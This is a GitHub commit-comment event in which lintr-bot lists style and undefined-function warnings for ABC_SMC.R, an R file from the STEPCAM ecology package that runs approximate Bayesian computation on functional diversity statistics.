{"id":"4580666685","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19072320,"position":null,"line":null,"path":null,"commit_id":"711f03fb45cd13c26930b2c9ede3363b80805d86","created_at":"2016-09-18T21:27:41Z","updated_at":"2016-09-18T21:27:41Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:29:5:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(disp_vals[i], filt_vals[i], comp_vals[i])\n    ^~~~~\n```\n[R/ABC_SMC.R:30:30:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L30) *style:* **Variable and function names should be all lowercase.**\n```r\n​    diff <- params[target] - prevP[target]\n                             ^~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:90:3:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:90:17:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:91:3:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:91:17:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:3:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:92:17:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:13:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:3:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n  ^~~~~~~\n```\n[R/ABC_SMC.R:95:16:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:3:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:96:15:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:3:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:97:15:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:3:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:98:15:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:3:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:100:15:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:101:3:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:101:15:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:102:3:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:102:15:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:104:21:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:3:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n  ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:25:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:16:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L113) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:5:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- d[, 1]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:119:5:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- d[, 2]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:120:5:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L120) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- d[, 3]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:125:11:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L125) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:125:31:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L125) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n                              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:5:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L144) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:12:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:29:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:35:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:159:45:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                            ^~~~~~~~\n```\n[R/ABC_SMC.R:159:55:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                                      ^~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:188:20:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L188) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:20:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L188) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L190) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L195) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:196:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L196) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:197:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L197) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L198) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:200:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L200) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L203) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L205) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:14:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:14:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L205) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:9:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:27:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:9:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:210:18:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:9:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:211:18:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:9:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:212:18:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:14:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n        ^~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:9:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:216:16:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:9:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:217:16:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:9:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n        ^~~~~~\n```\n[R/ABC_SMC.R:218:16:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:11:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:23:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:39:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L221) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] = 1\n                                      ^\n```\n[R/ABC_SMC.R:223:11:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:23:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:39:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L223) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] =\n                                      ^\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:53:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:224:63:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                              ^~~~~~~~\n```\n[R/ABC_SMC.R:225:29:](https://github.com/thijsjanzen/STEPCAM/blob/711f03fb45cd13c26930b2c9ede3363b80805d86/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            